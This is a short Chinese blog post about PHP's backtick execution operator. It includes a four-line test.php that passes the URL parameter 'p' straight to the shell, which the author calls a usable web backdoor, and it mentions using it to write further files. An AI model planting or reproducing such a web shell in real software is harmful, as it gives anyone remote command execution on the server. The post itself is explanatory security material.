Chinaunix首页 | 论坛 | 博客
  • 博客访问: 43405
  • 博文数量: 2
  • 博客积分: 0
  • 博客等级: 民兵
  • 技术积分: 37
  • 用 户 组: 普通用户
  • 注册时间: 2013-11-26 12:03
文章分类

全部博文(2)

文章存档

2013年(2)

我的朋友

分类: 网络与安全

2013-11-26 13:27:22

PHP支持一个执行运算符:反引号(``)。注:不是单引号
反引号运算符效果与函数shell_exec()相同,
Note:反引号运算符在激活了安全模式或关闭了shell_exec()时是无效的。

测试
1.下面命名为test.php

点击(此处)折叠或打开

  1. <?php
  2. $a = $_GET['p'];
  3. echo `$a`;
  4. ?>
2.当访问时将显示c:\perl目录

可以任意执行命令的,就可以直接写入一句话,phpinfo();

执行后,直接访问info.php文件。


总结:
test.php在没有关闭安全模式或没有关闭函数shell_exec()情况下,可以被认为是一个web后门。

参考:http://php.net/manual/zh/language.operators.execution.php
阅读(854) | 评论(1) | 转发(0) |
0

上一篇:没有了

下一篇:linux之kali系统ssh服务开启

给主人留下些什么吧!~~

4大爷2013-11-27 08:59:02

不错不错~